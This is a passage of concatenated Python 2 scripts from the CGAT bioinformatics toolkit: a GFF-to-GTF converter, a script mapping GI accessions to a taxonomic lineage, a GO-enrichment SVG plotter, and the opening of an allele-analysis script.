def convert_hierarchy(first_gffs, second_gffs, options):
''' Converts GFF to GTF by parsing the hierarchy.
First parses :param:first_gffs to build the hierarchy then iterates over second_gffs
using a call to the recursive function search_hierarchy to identify gene_ids and transcript_ids.
If multiple gene and transcript_ids are found outputs a record for each combination.
If no definitive transcript_id is found and options.missing_gene is True, it will use the
possible_transcript_id as transcript_id, which is the ID one level below the entry used as gene_id.
If this is also None (that is there was only on level), sets transcript_id to gene_id.
Might raise ValueError if options.missing_gene is false and either no gene or no transcript_id
was found for an entry.
Might raise RuntimeError if the recursion limit was reached because the input contains circular
references. '''
hierarchy = {}
for gff in first_gffs:
if not(options.parent == "Parent"):
if options.parent in gff.asDict():
gff['Parent'] = gff[options.parent].split(",")
else:
gff['Parent'] = []
hierarchy[gff['ID']] = {
"type": gff.feature,
"Parent": gff.asDict().get("Parent", []),
"gene_id": gff.attributes.get(
options.gene_field_or_pattern, gff['ID']),
"transcript_id": gff.attributes.get(
options.transcript_field_or_pattern, gff['ID'])}
for gff in second_gffs:
if options.discard and (
(options.missing_gene and options.parent not in gff) or (
gff.feature in (options.gene_type, options.transcript_type))):
continue
gene_ids, transcript_ids, poss_transcript_ids = search_hierarchy(
gff['ID'], hierarchy, options)
assert len(gene_ids) > 0 and len(transcript_ids) > 0
if options.missing_gene:
transcript_ids = [poss if found is None else found
for found, poss in
zip(transcript_ids, poss_transcript_ids)]
transcript_ids = [gid if found is None else found
for found, gid in
zip(transcript_ids, gene_ids)]
elif None in transcript_ids:
raise ValueError("failed to find transcript id for %s" % gff['ID'])
for gene_id, transcript_id in zip(gene_ids, transcript_ids):
gff.gene_id = gene_id
gff.transcript_id = transcript_id
gtf_entry = GTF.Entry()
gtf_entry.copy(gff)
if "Parent" in gtf_entry:
gtf_entry['Parent'] = ",".join(gtf_entry['Parent'])
options.stdout.write(str(gtf_entry) + "\n")
def convert_set(gffs, gene_pattern, transcript_pattern, options):
''' creates the gene_id and transcript_id fields from a string format pattern using
fields of the gff. '''
for gff in gffs:
gff.gene_id = str(gene_pattern) % gff.asDict()
gff.transcript_id = str(gene_pattern) % gff.asDict()
gtf_entry = GTF.Entry()
gtf_entry.copy(gff)
if "Parent" in gtf_entry:
gtf_entry['Parent'] = ",".join(gtf_entry['Parent'])
options.stdout.write(str(gtf_entry) + "\n")
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("-m", "--method", dest="method", type="choice", action="store",
choices=(
"hierarchy", "set-field", "set-pattern", "set-none"),
help="Method to use for conversion")
parser.add_option("-g", "--gene-type", dest="gene_type", type="string",
help="feature type to get gene_id from if possible [%default]")
parser.add_option("-t", "--transcript-type", dest="transcript_type", type="string",
help="feature type to get transcript_id from if possible [%default]")
parser.add_option("-d", "--no-discard", dest="discard", action="store_false",
help="Do not discard feature types specified by GENE_TYPE and TRANSCRIPT_TYPE")
parser.add_option("--gene-id", dest="gene_field_or_pattern", type="string",
help="Either field or pattern for the gene_id [%default]")
parser.add_option("--transcript-id", dest="transcript_field_or_pattern", type="string",
help="Either field or pattern for the transcript_id [%default]")
parser.add_option("--parent-field", dest="parent", type="string",
help="field that specifies the parent relationship. Currently only"
"if left as Parent will features with multiple parents be parsed"
"correctly""")
parser.add_option("--read-twice", dest="read_twice", action="store_true",
help="Instead of holding the whole file in memory, read once for parsing the "
"hierarchy, and then again for actaully doing the conversion. Means a real file "
"and not a pipe must be provided.""")
parser.add_option("--by-chrom", dest="by_chrom", action="store_true",
help="Parse input file one choromosome at a time. Reduces memory usage, "
"but input must be sorted by chromosome and features may not split accross "
" multiple chromosomes""")
parser.add_option("--fail-missing-gene", dest="missing_gene", action="store_false",
help="Fail if no feature of type GENE_TYPE is found instead of using "
"defaulting to highest object in hierarchy""")
parser.set_defaults(
method="hierarchy",
gene_type="gene",
transcript_type="mRNA",
discard=True,
gene_field_or_pattern="ID",
transcript_field_or_pattern="ID",
read_twice=False,
by_chrom=False,
missing_gene=True,
parent="Parent"
)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
gffs = GFF3.flat_file_iterator(options.stdin)
if options.by_chrom:
gffs = GFF3.chrom_iterator(gffs)
else:
gffs = [gffs]
# running early so that fails early if configuration is wrong
if options.read_twice:
# Will throw IOError if options.stdin is not a normal file
second_gff = GFF3.flat_file_iterator(
IOTools.openFile(options.stdin.name))
if options.by_chrom:
second_gff = GFF3.chrom_iterator(second_gff)
else:
second_gff = iter([second_gff])
else:
second_gff = None
for chunk in gffs:
if options.read_twice:
second_gff_chunk = second_gff.next()
else:
chunk = list(chunk)
second_gff_chunk = chunk
if options.method == "hierarchy":
convert_hierarchy(chunk, second_gff_chunk, options)
elif options.method == "set-field":
gene_id_pattern = "%%(%s)s" % options.gene_field_or_pattern
transcript_id_pattern = "%%(%s)s" % options.transcript_field_or_pattern
convert_set(chunk, gene_id_pattern, transcript_id_pattern, options)
elif options.method == "set-pattern":
convert_set(chunk, options.gene_field_or_pattern,
options.transcript_field_or_pattern, options)
elif options.method == "set-none":
convert_set(chunk, None, None, options)
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/gi2parents.py
```python
import sys
import optparse
import CGAT.IOTools as IOTools
import CGAT.Experiment as E
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = optparse.OptionParser(version="%prog version: $Id: script_template.py 2871 2010-03-03 10:20:44Z andreas $",
usage=globals()["__doc__"])
parser.add_option("-g", "--gi-accessions", dest="gi_accessions", type="string",
help="list of gi accession numbers")
parser.add_option("-m", "--ncbi-map", dest="ncbi_map", type="string",
help="ncbi.map file downloaded from the MEGAN website")
parser.add_option("-n", "--nucl-map", dest="nucl_map", type="string",
help="gi mapping to tax id downloaded from ncbi website")
parser.add_option("-c", "--taxa-code", dest="taxa_code", type="string",
help="code for different levels of the taxonomy downloaded from the MEGAN website")
parser.add_option("-t", "--tree", dest="tree", type="string",
help="description of parents in the taxonomy")
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
E.info("reading gi accession numbers")
gi_accessions = set()
for line in open(options.gi_accessions).readlines():
gi_accessions.add(line[:-1])
E.info("read gi accession numbers")
E.info("building gi2taxid map")
gi2taxid = {}
c_gi = 0
for line in IOTools.openFile(options.nucl_map).readlines():
data = line[:-1].split("\t")
if data[0] not in gi_accessions:
continue
else:
c_gi += 1
gi2taxid[data[0]] = data[1]
E.info("built gi2taxid for %i gi accession numbers" % c_gi)
E.info("building code map")
code2taxa = {}
for line in open(options.taxa_code).readlines():
data = line[:-1].split("\t")
code2taxa[data[0]] = data[1]
E.info("built taxa code map")
E.info("building taxa2name map")
taxid2name = {}
for line in open(options.ncbi_map).readlines():
data = line[:-1].split("\t")
# keep the taxa code
taxid2name[data[0]] = (data[1], data[3])
E.info("built taxa2name map")
E.info("build taxid2parentmap")
taxid2parents = {}
for line in open(options.tree).readlines():
data = line[:-1].split("\t")
data = [x for x in data if x != "|"]
taxid2parents[data[0]] = data[1]
E.info("built taxid2parentmap")
E.info("retrieving parents for each gi accession number")
options.stdout.write(
"gi\tsub_species\tspecies\tgenus\tfamily\torder\tclass\tphylum\n")
for gi, taxid in gi2taxid.iteritems():
# this will be the sub species id
# walk through the parents
parents = {}
sub_species = taxid2name[taxid][0]
for i in range(len(code2taxa.keys())):
parent_taxid = taxid2parents[taxid]
parent_name = taxid2name[parent_taxid][0]
parent_code = taxid2name[parent_taxid][1]
# ignore codes that we are not interested in
if parent_code not in code2taxa.keys():
continue
parent_taxa = code2taxa[parent_code]
parents[parent_taxa] = parent_name
taxid = parent_taxid
if "genus" not in parents:
genus = "NA"
else:
genus = parents["genus"]
if "family" not in parents:
family = "NA"
else:
family = parents["family"]
if "order" not in parents:
order = "NA"
else:
order = parents["order"]
if "class" not in parents:
_class = "NA"
else:
_class = parents["class"]
if "phylum" not in parents:
phylum = "NA"
else:
phylum = parents["phylum"]
if phylum.find("<phylum>") != -1:
phylum = phylum.replace(" <phylum>", "")
if "species" not in parents:
species = "NA"
else:
species = parents["species"]
options.stdout.write("\t".join([gi, sub_species.replace(" ", "_"), species.replace(
" ", "_"), genus, family, order, _class, phylum]) + "\n")
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/go2svg.py
```python
import os
import sys
import string
import re
import math
import tempfile
import bisect
import numpy
import CGAT.Experiment as E
import CGAT.SVGdraw as SVGdraw
import CGAT.CorrespondenceAnalysis as CorrespondenceAnalysis
import CGAT.Stats as Stats
class DataPoint:
def __init__(self):
pass
class DataFDR:
def __init__(self):
pass
def Collect(infile,
with_headers=False,
annotator_format=False,
use_annotator_fdr=False,
delims="",
ignore="",
max_pvalue=1.0,
max_qvalue=None):
"""read input table."""
data = []
lines = filter(lambda x: x[0] != "#", infile.readlines())
if len(lines) == 0:
return data
if with_headers:
del lines[0]
if annotator_format:
lines = [line for line in lines if not line.startswith("Iteration")]
annotator_fdr = {}
annotator_level = None
for line in lines:
if len(line) == 1:
continue # skip trailing blank lines
if line.startswith("--"):
if line.startswith("-- False"):
annotator_level = float(
re.search("-- False Discovery summary for p-value (.+):", line).groups()[0])
annotator_fdr[annotator_level] = {}
elif line.startswith("-- Category"):
pass
else:
if re.search("insufficiently", line):
continue
dd = re.split("\s+", line[4:-1])
d = DataFDR()
d.mObserved, d.mAverage, d.mMedian, d.m95 = map(
float, dd[1:])
annotator_fdr[annotator_level][dd[0]] = d
continue
else:
if line[0] == "Z":
continue # skip header
if len(line[:-1].split('\t')) != 9:
continue # HACK: accounts for a bug in Annotator output
try:
(z, percentchange, pvalue, observed, expected, low95,
up95, stddev, description) = line[:-1].split('\t')[:9]
except ValueError:
raise ValueError("# parsing error in line: %s" % line[:-1])
d = DataPoint()
d.mAnnotation = description
d.mPValue = float(pvalue)
d.mFoldChange = 1.0 + float(percentchange) / 100.0
data.append(d)
else:
for line in lines:
try:
(code, goid, scount, stotal, spercent, bcount, btotal, bpercent, ratio,
pover, punder, goid, category, description) = line[:-1].split("\t")[:14]
except ValueError:
raise ValueError("# parsing error in line: %s" % line[:-1])
if code == "+":
p = pover
else:
p = punder
d = DataPoint()
d.mAnnotation = description
d.mPValue = float(p)
d.mFoldChange = float(spercent) / float(bpercent)
data.append(d)
# apply filters
for c in delims:
for d in data:
d.mAnnotation = d.mAnnotation.split(c)[0]
for c in ignore:
for d in data:
d.mAnnotation = d.mAnnotation.replace(c, '')
ninput = len(data)
no_fdr = False
# apply filters
if ninput > 0:
if max_qvalue is not None:
if use_annotator_fdr:
pvalues = annotator_fdr.keys()
pvalues.sort()
pvalues.reverse()
for pvalue in pvalues:
try:
d = annotator_fdr[pvalue]["Significant"]
except KeyError:
continue
if d.mObserved == 0:
E.info("no data remaining after fdr filtering")
data = []
break
elif d.mAverage / d.mObserved < max_qvalue:
E.info("filtering with P-value of %f" % pvalue)
data = [x for x in data if x.mPValue < pvalue]
break
else:
E.warn("fdr could not be computed - compute more "
"samples (at P = %f, actual fdr=%f)" %
(pvalue, d.mAverage / d.mObserved))
no_fdr = True
if no_fdr:
if use_annotator_fdr:
E.info("estimating FDR from observed P-Values")
pvalues = [x.mPValue for x in data]
vlambda = numpy.arange(0, max(pvalues), 0.05)
try:
qvalues = Stats.doFDR(
pvalues, vlambda=vlambda, fdr_level=max_qvalue)
except ValueError, msg:
E.warn(
"fdr could not be computed - no filtering: %s" % msg)
no_fdr = True
else:
data = [x[0] for x in zip(data, qvalues.mPassed) if x[1]]
elif max_pvalue is not None:
data = [x for x in data if x.mPValue < max_pvalue]
if no_fdr:
data = []
nremoved = ninput - len(data)
return data, nremoved, no_fdr
# some definitions for the layout of the picture
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
YELLOW = (255, 255, 0)
CYAN = (0, 255, 255)
PURPLE = (255, 0, 255)
GREY = (128, 128, 128)
MAX_GREY = 240
GREY_COLORS = map(lambda x: (x, x, x), range(0, MAX_GREY))
DEFAULT_XWIDTH = 500
DEFAULT_YWIDTH = 500
DEFAULT_LINE_DISTANCE = 10
DEFAULT_OFFSET_Y = 20
DEFAULT_BOX_WIDTH = 15
DEFAULT_LINE_SPACING = 40
DEFAULT_TEXT_DISTANCE = 40
DEFAULT_ANNOTATION_DISTANCE = 20
DEFAULT_LINE_WIDTH = 2
DEFAULT_SCALE_FACTOR = 1.0
DEFAULT_COLOR_SEQUENCE = BLACK
DEFAULT_COLOR_ANNOTATION = BLACK
class GoPlot:
def __init__(self,
row_names,
col_names,
thresholds_size,
thresholds_colour,
alt_colours,
template="screen",
max_pvalue=None,
max_qvalue=None,
mark_columns=None,
):
"""If max_pvalue and max_qvalue are given, they are
added to the footer.
If mark_columns is given, the columns for which
mark_columns is True are marked.
"""
self.mElements = []
self.mTemplate = template
# save row names
self.mRowNames = row_names
self.mColNames = col_names
# colours
self.startColour = RED
self.mMiddleColour = YELLOW
self.mStopColour = GREEN
self.mAltColours = alt_colours
# a space
self.mSeparator = 10
# info
self.mMaxPValue = max_pvalue
self.mMaxQValue = max_qvalue
# width and height of a row/column
# GAL changed; was 200
self.mRowHeight = 150
self.mColWidth = 200
# maximum size of a box
self.mMaxBoxSize = 140
self.mRevertSize = True
# Height and width get set
# GAL changed; was 2.0
self.mHeaderFontSize = self.mRowHeight / 1.5
self.mHeaderFont = "Verdana"
self.mThresholdsSize = thresholds_size
self.mThresholdsSizeTitle = "P-Values"
self.mThresholdsColour = thresholds_colour
self.mThresholdsColourTitle = "Fold change"
# write a grid line every five rows
self.mRowTicks = 5
self.mColTicks = 5
# footer
self.mFooterFrom = 10
self.mFooterFontSize = self.mRowHeight / 1.5
self.mFooterFont = "Verdana"
self.mFooter = None
# page margin
self.mBottomMargin = 300
# Title
self.mTitleFontSize = self.mRowHeight
self.mTitleFont = "Verdana"
self.mTitle = None
if self.mTemplate == "screen":
# screen is default
pass
elif self.mTemplate == "publication":
self.startColour = RED
self.mMiddleColour = WHITE
self.mStopColour = BLUE
self.mMarkColumns = mark_columns
if self.mMarkColumns:
assert len(self.mMarkColumns) == len(self.mColNames), \
"length of mark_columns must equal length of columns"
self.initializePlot()
def initializePlot(self):
"""set various coordinates in the plot."""
# height of col header
self.mHeaderHeight = max(
map(len, self.mColNames)) * self.mHeaderFontSize / 2
if self.mTitle:
self.mHeaderHeight += self.mSeparator + self.mTitleFontSize
# width of row header
self.mHeaderWidth = max(
map(len, self.mRowNames)) * self.mHeaderFontSize / 2
# height of footer:
self.mFooterHeight = 2 * \
max(self.mFooterFontSize, self.mMaxBoxSize) + self.mSeparator
if self.mFooter:
self.mFooterHeight += self.mSeparator + self.mFooterFontSize
# height and width of data section
self.mDataWidth = len(col_names) * self.mColWidth
self.mDataHeight = len(row_names) * self.mRowHeight
# build coordinates for rows and columns
self.buildMapRow2Position()
self.buildMapCol2Position()
# build colour map
self.buildColourMap()
self.mPageWidth = self.mHeaderWidth + \
self.mDataWidth + 1 * self.mSeparator
self.mPageHeight = self.mHeaderHeight + self.mDataHeight + \
self.mFooterHeight + 2 * self.mSeparator + self.mBottomMargin
def setTitle(self, title):
"""set title."""
self.mTitle = title
def setFooter(self, footer):
"""set footer."""
self.mFooter = footer
def writeTitle(self):
"""write title into plot."""
if self.mTitle:
e = SVGdraw.text(self.mPageWidth / 2,
self.mTitleFontSize,
self.mTitle,
self.mTitleFontSize,
self.mTitleFont,
stroke="rgb(%i,%i,%i)" % BLACK,
text_anchor="middle")
self.mElements.append(e)
def buildColourMap(self):
"""build map of thresholds to colours.
This is two gradients:
1: first half: start to middle
2: second half: middle to end
"""
self.mColours = []
if self.mAltColours:
for colidx in range(len(self.mThresholdsColour) + 1):
col = colidx / (len(self.mThresholdsColour) - 0.0)
if col == 0.5:
x = 0
col0 = [0, 0, 0]
col1 = [0, 0, 0]
elif col < 0.5:
x = min(1, 1 - 2 * col)
col0 = [26, 0, 128]
col1 = [255, 0, 0]
else:
x = min(1, 2 * col - 1)
col0 = [26, 52, 13]
col1 = [230, 255, 52]
self.mColours.append((col0[0] + x * (col1[0] - col0[0]),
col0[1] + x * (col1[1] - col0[1]),
col0[2] + x * (col1[2] - col0[2])))
else:
num_steps = int(
math.floor((len(self.mThresholdsColour) + 1) / 2.0))
d = map(lambda x, y: (x - y) / num_steps,
self.mMiddleColour, self.startColour)
for x in range(num_steps):
self.mColours.append((self.startColour[0] + x * d[0],
self.startColour[1] + x * d[1],
self.startColour[2] + x * d[2]))
# self.mColours.append( self.mMiddleColour )
d = map(lambda x, y: (x - y) / num_steps,
self.mStopColour, self.mMiddleColour)
for x in range(1, num_steps):
self.mColours.append((self.mMiddleColour[0] + x * d[0],
self.mMiddleColour[1] + x * d[1],
self.mMiddleColour[2] + x * d[2]))
self.mColours.append(self.mStopColour)
def buildMapRow2Position(self):
# build map of row_name to row
self.mMapRow2Position = {}
offset = self.mHeaderHeight + self.mSeparator
for x in range(len(self.mRowNames)):
self.mMapRow2Position[
self.mRowNames[x]] = offset + x * self.mRowHeight
def buildMapCol2Position(self):
# build map of row_name to row
self.mMapCol2Position = {}
for x in range(len(self.mColNames)):
self.mMapCol2Position[self.mColNames[x]] = x * self.mColWidth
def addValue(self, row, col, size, colour_value):
"""add a dot in row/col.
"""
# decide the size of the box
pos = bisect.bisect(self.mThresholdsSize, size)
if self.mRevertSize:
size = self.mMaxBoxSize * \
(1.0 - float(pos) / len(self.mThresholdsSize))
else:
size = self.mMaxBoxSize * float(pos) / len(self.mThresholdsSize)
d = (self.mMaxBoxSize - size) / 2
x = self.mMapCol2Position[col] + d
try:
y = self.mMapRow2Position[row] + d
except KeyError:
return
# determine the colour of the box
pos = bisect.bisect(self.mThresholdsColour, colour_value)
colour = self.mColours[pos]
e = SVGdraw.rect(x, y,
size, size,
stroke="black",
fill="rgb(%i,%i,%i)" % colour)
self.mElements.append(e)
def writeColHeaders(self):
"""write row headers."""
current_x = self.mColWidth / 2
current_y = self.mHeaderHeight
for i in range(len(self.mColNames)):
if self.mMarkColumns and self.mMarkColumns[i]:
color = BLUE
name = self.mColNames[i] + "*"
else:
color = BLACK
name = self.mColNames[i]
e = SVGdraw.text(
current_x,
current_y,
name,
self.mHeaderFontSize,
self.mHeaderFont,
stroke="rgb(%i,%i,%i)" % color,
text_anchor="start",
transform="rotate(-45,%i,%i)" % (current_x, current_y))
self.mElements.append(e)
current_x += self.mColWidth
# current_y -= self.mColWidth / 2 # GAL added # AH removed?
def writeGrid(self):
"""add grid lines."""
if self.mRowTicks:
start_x = 0,
end_x = self.mDataWidth + self.mSeparator + self.mHeaderWidth
current_y = self.mHeaderHeight + self.mSeparator / \
2 + self.mRowTicks * self.mRowHeight
for x in range(self.mRowTicks, len(self.mRowNames),
self.mRowTicks):
e = SVGdraw.line(start_x,
current_y,
end_x,
current_y,
stroke="rgb(%i,%i,%i)" % BLACK)
self.mElements.append(e)
current_y += self.mRowTicks * self.mRowHeight
if self.mColTicks:
start_y = self.mHeaderHeight + self.mSeparator / 2
end_y = start_y + self.mDataHeight
current_x = self.mColTicks * self.mColWidth - self.mColWidth / 2
for x in range(self.mColTicks, len(self.mColNames),
self.mColTicks):
e = SVGdraw.line(current_x,
start_y,
current_x,
end_y,
stroke="rgb(%i,%i,%i)" % BLACK)
self.mElements.append(e)
current_x += self.mColTicks * self.mColWidth
def writeRowHeaders(self):
"""write row headers."""
current_x = self.mDataWidth + self.mSeparator
current_y = self.mHeaderHeight + self.mSeparator + self.mHeaderFontSize
for name in self.mRowNames:
e = SVGdraw.text(current_x,
current_y,
name,
self.mHeaderFontSize,
self.mHeaderFont,
stroke="rgb(%i,%i,%i)" % BLACK,
text_anchor="start")
self.mElements.append(e)
current_y += self.mRowHeight
self.mHeaderWidth = max(
map(len, self.mRowNames)) * self.mHeaderFontSize / 2
def writeFooter(self):
"""write footer.
The footer contains the legend.
"""
current_x = self.mFooterFrom
current_y = self.mHeaderHeight + self.mDataHeight + 2 * self.mSeparator
###########################################################
# Draw legend 1: size of boxes
e = SVGdraw.text(current_x,
current_y + self.mFooterFontSize,
self.mThresholdsSizeTitle,
self.mFooterFontSize,
self.mFooterFont,
stroke="rgb(%i,%i,%i)" % BLACK,
text_anchor="start")
current_x += len(self.mThresholdsSizeTitle) * \
self.mFooterFontSize / 1.5 + self.mSeparator
self.mElements.append(e)
l = len(self.mThresholdsSize)
for x in range(l):
if self.mRevertSize:
p = int(self.mMaxBoxSize * (1.0 - float(x) / l))
else:
p = int(self.mMaxBoxSize * (float(x) / l))
e = SVGdraw.rect(current_x,
current_y + (self.mMaxBoxSize - p) / 2,
p, p,
stroke="black",
fill="rgb(%i,%i,%i)" % self.startColour)
self.mElements.append(e)
current_x += self.mMaxBoxSize + self.mSeparator
t = "< %g" % (self.mThresholdsSize[x])
e = SVGdraw.text(current_x,
current_y + self.mFooterFontSize,
t,
self.mFooterFontSize,
self.mFooterFont,
stroke="rgb(%i,%i,%i)" % BLACK,
text_anchor="start")
current_x += len(t) * self.mFooterFontSize / 1.5 + self.mSeparator
self.mElements.append(e)
###########################################################
# Draw legend 2: colour of boxes
current_x = self.mFooterFrom
current_y += max(self.mFooterFontSize, self.mMaxBoxSize) + \
self.mSeparator
e = SVGdraw.text(current_x,
current_y + self.mFooterFontSize,
self.mThresholdsColourTitle,
self.mFooterFontSize,
self.mFooterFont,
stroke="rgb(%i,%i,%i)" % BLACK,
text_anchor="start")
current_x += len(self.mThresholdsColourTitle) * \
self.mFooterFontSize / 1.5 + self.mSeparator
self.mElements.append(e)
l = len(self.mThresholdsColour)
for x in range(l + 1):
p = self.mMaxBoxSize
if x < l:
t = "< %g" % (self.mThresholdsColour[x])
else:
t = "> %g" % (self.mThresholdsColour[x - 1])
e = SVGdraw.rect(current_x,
current_y,
p, p,
stroke="black",
fill="rgb(%i,%i,%i)" % self.mColours[x])
self.mElements.append(e)
current_x += self.mMaxBoxSize + self.mSeparator
e = SVGdraw.text(current_x,
current_y + self.mFooterFontSize,
t,
self.mFooterFontSize,
self.mFooterFont,
stroke="rgb(%i,%i,%i)" % BLACK,
text_anchor="start")
current_x += len(t) * self.mFooterFontSize / 1.5 + self.mSeparator
self.mElements.append(e)
###########################################################
if self.mMaxPValue is not None or self.mMaxQValue is not None:
current_y += max(self.mFooterFontSize / 1.5,
self.mMaxBoxSize) + self.mSeparator
a = []
if self.mMaxPValue:
a.append("P < %6.4f" % self.mMaxPValue)
if self.mMaxQValue:
a.append("FDR = %6.4f" % self.mMaxQValue)
e = SVGdraw.text(self.mPageWidth / 2,
current_y + self.mFooterFontSize,
" ".join(a),
self.mFooterFontSize,
self.mFooterFont,
stroke="rgb(%i,%i,%i)" % BLACK,
text_anchor="middle")
###########################################################
if self.mFooter:
current_y += max(self.mFooterFontSize / 1.5,
self.mMaxBoxSize) + self.mSeparator
e = SVGdraw.text(self.mPageWidth / 2,
current_y + self.mFooterFontSize,
self.mFooter,
self.mFooterFontSize,
self.mFooterFont,
stroke="rgb(%i,%i,%i)" % BLACK,
text_anchor="middle")
self.mElements.append(e)
def finalizePlot(self):
"""write remaining parts of the plot."""
self.writeGrid()
self.writeTitle()
self.writeFooter()
self.writeRowHeaders()
self.writeColHeaders()
def writeToFile(self, outfile):
"""write svg image to file.
"""
self.finalizePlot()
self.mRoot = SVGdraw.drawing()
self.mDraw = SVGdraw.svg(
(0, 0, self.mPageWidth, self.mPageHeight), "100%", "100%")
for e in self.mElements:
self.mDraw.addElement(e)
self.mRoot.setSVG(self.mDraw)
tfile = tempfile.mktemp()
self.mRoot.toXml(tfile)
lines = open(tfile, "r").readlines()
outfile.write(string.join(lines, ""))
outfile.write("\n")
os.remove(tfile)
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
parser = E.OptionParser(
version="%prog version: $Id")
parser.add_option("-e", "--header-names", dest="headers", action="store_true",
help="first row is a header [ignored].")
parser.add_option("-t", "--title", dest="title", type="string",
help="page title.")
parser.add_option("-f", "--footer", dest="footer", type="string",
help="page footer.")
parser.add_option("--maxP", dest="max_pvalue", type="float",
help="maximum P-value displayed [default=%default].")
parser.add_option("--maxQ", dest="max_qvalue", type="float",
help="maximum Q-value for controlling for FDR [default=%default].")
parser.add_option("-c", "--column-titles", dest="col_names", type="string",
help="comma separated list of column titles [default: use filenames].")
parser.add_option("-p", "--pattern-filename", dest="pattern_filename", type="string",
help="pattern to map columns to filename.")
parser.add_option("-A", "--Annotator", dest="annotator", action="store_true",
help="use Annotator-style input files.")
parser.add_option("--annotator-fdr", dest="annotator_fdr", action="store_true",
help="use fdr computed from annotator [default=%default].")
parser.add_option("-T", "--thresholds", dest="thresholds", type="string",
help="7 comma-separated fold-change threshold values")
parser.add_option("-P", "--pvalues", dest="pvalues", type="string",
help="6 comma-separated p value threshold values"),
parser.add_option("-C", "--altcolours", dest="altcolours", action="store_true",
help="Use alternative colour palette")
parser.add_option("-X", "--delimiters", dest="delims", type="string",
help="Delimiter characters for annotation label")
parser.add_option("-Z", "--ignore", dest="ignore", type="string",
help="Ignored characters in annotation label")
parser.add_option("--fdr", dest="fdr", type="float",
help="filter output by FDR (requires annotator output). [default=%default]")
parser.add_option("-a", "--template", dest="template", type="choice",
choices=("screen", "publication"),
help="layout template to choose - affects colours.")
parser.add_option("--sort-columns", dest="sort_columns", type="choice",
choices=("unsorted", "similarity", "alphabetical", ),
help="sort columns. The default, unsorted, list columns in the order that they are supplied on the command line [default=%default]")
parser.set_defaults(
sortAlphabetically=True,
headers=False,
col_names="",
pattern_filename=None,
title="",
footer="",
max_pvalue=None,
max_qvalue=None,
annotator=False,
thresholds="0.25,0.33,0.5,1.0,2.0,3.0,4.0",
pvalues="0.00001,0.0001,0.001,0.01,0.1",
altcolours=False,
delims="",
ignore="",
template="screen",
annotator_fdr=False,
fdr=None,
sort_columns="unsorted",
)
(options, args) = E.Start(parser, add_pipe_options=True)
if len(args) == 0:
raise IOError("Please supply at least one input file.")
if options.pattern_filename:
input = []
col_names = args
for x in col_names:
input.append(options.pattern_filename % x)
else:
input = args
if options.col_names:
col_names = options.col_names.split(",")
if len(col_names) != len(input):
raise ValueError(
"Number of col_names and files different: %i != %i" %
(len(col_names), len(input)))
else:
col_names = input
E.info("reading data for %i columns" % len(input))
columns = []
errors = []
for col_name, filename in zip(col_names, input):
E.debug("reading data for column %s from %s " % (col_name, filename))
# collect all columns
try:
values, nremoved, no_fdr = Collect(
open(filename, "r"),
with_headers=options.headers,
annotator_format=options.annotator,
delims=options.delims,
ignore=options.ignore,
use_annotator_fdr=options.annotator_fdr,
max_pvalue=options.max_pvalue,
max_qvalue=options.max_qvalue)
except IOError:
E.warn("no data from %s" % filename)
values = []
no_fdr = False
nremoved = 0
E.info("read %i values from %s: %i significant, %i removed" %
(len(values) + nremoved, filename,
len(values),
nremoved))
columns.append((col_name, values))
errors.append(no_fdr)
if sum([len(x) for x in columns]) == 0:
raise IOError("no data read - please check supplied files.")
# collect all annotations
# Also filter for max pvalue
annotations = set()
for col_name, column in columns:
for d in column:
annotations.add(d.mAnnotation)
E.info("There are %i rows" % len(annotations))
# sort and filter annotations
# (Code removed which did some filtering; the annotations data is not used)
# By removing labels from annlist you can select the annotations you want
# to display
row_names = list(annotations)
if options.sortAlphabetically:
row_names.sort()
if options.sort_columns == "unsorted":
pass
elif options.sort_columns == "alphabetical":
col_names.sort()
elif options.sort_columns == "similarity":
if len(row_names) * len(col_names) > 10000:
E.info("no sorting as matrix too large")
else:
matrix = numpy.ones((len(row_names), len(col_names)), numpy.float)
map_rows = dict(zip(row_names, range(len(row_names))))
x = 0
for col_name, column in columns:
for d in column:
matrix[map_rows[d.mAnnotation], x] = d.mFoldChange
x += 1
row_indices, col_indices = CorrespondenceAnalysis.GetIndices(
matrix)
map_row_new2old = numpy.argsort(row_indices)
map_col_new2old = numpy.argsort(col_indices)
row_names = [row_names[map_row_new2old[x]]
for x in range(len(row_names))]
col_names = [col_names[map_col_new2old[x]]
for x in range(len(col_names))]
E.info("columns have been sorted")
plot = GoPlot(row_names,
col_names,
thresholds_size=tuple(
map(float, options.pvalues.split(','))),
thresholds_colour=tuple(
map(float, options.thresholds.split(','))),
template=options.template,
alt_colours=options.altcolours,
max_pvalue=options.max_pvalue,
max_qvalue=options.max_qvalue,
mark_columns=errors)
if options.title:
plot.setTitle(options.title)
if options.footer:
plot.setFooter(options.footer)
plot.initializePlot()
for col_name, column in columns:
for d in column:
plot.addValue(d.mAnnotation,
col_name,
d.mPValue,
d.mFoldChange)
plot.writeToFile(options.stdout)
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/gtf2alleles.py
```python
import sys
import collections
import sqlite3
import CGAT.Experiment as E
import CGAT.IOTools as IOTools
import CGAT.IndexedFasta as IndexedFasta
import CGAT.Genomics as Genomics
import CGAT.GTF as GTF
import CGAT.Blat as Blat
import CGAT.Variants as Variants
import alignlib_lite
import pysam
Allele = collections.namedtuple('Allele',
'''cds,
peptide,
nexons,
cds_starts,
exon_starts,
frames,
is_nmd_knockout,
is_splice_truncated,
is_stop_truncated,
nframeshifts,
ncorrected_frameshifts,
nuncorrected_frameshits,
peptide_first_stop,
peptide_len,
cds_first_stop,
cds_len,
reference_first_stop_start,
reference_first_stop_end,
cds_original_len,
nsplice_noncanonical,
''')
class VariantGetter(object):
'''base class for objects returning variants.'''
pass
